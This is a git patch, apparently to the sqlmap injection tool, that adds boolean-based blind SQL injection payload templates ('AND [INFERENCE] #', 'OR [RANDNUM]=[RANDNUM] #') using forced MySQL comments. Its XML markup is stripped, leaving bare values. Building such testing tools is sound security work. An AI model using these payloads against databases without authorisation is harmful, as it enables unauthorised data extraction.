From e6143beeaeefb18692abce1834e74388f7a1d25b Mon Sep 17 00:00:00 2001 From: ark Date: Mon, 23 Jan 2017 18:24:26 +0100 Subject: [PATCH] Added payload for forced comments on boolean-based blind injections for WHERE or HAVING clause --- xml/payloads/boolean_blind.xml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) diff --git a/xml/payloads/boolean_blind.xml b/xml/payloads/boolean_blind.xml index 114097cf7..e4b1b96e9 100644 --- a/xml/payloads/boolean_blind.xml +++ b/xml/payloads/boolean_blind.xml @@ -171,6 +171,22 @@ Tag: + + AND boolean-based blind - WHERE or HAVING clause (Forced MySQL comment) + 1 + 1 + 1 + 1,9 + 1 + AND [INFERENCE] # + + AND [RANDNUM]=[RANDNUM] # + + + AND [RANDNUM]=[RANDNUM1] # + + + OR boolean-based blind - WHERE or HAVING clause 1 @@ -187,6 +203,22 @@ Tag: + + OR boolean-based blind - WHERE or HAVING clause (Forced MySQL comment) + 1 + 1 + 3 + 1,9 + 2 + OR [INFERENCE] # + + OR [RANDNUM]=[RANDNUM] # + + + OR [RANDNUM]=[RANDNUM1] # + + + OR boolean-based blind - WHERE or HAVING clause (NOT) 1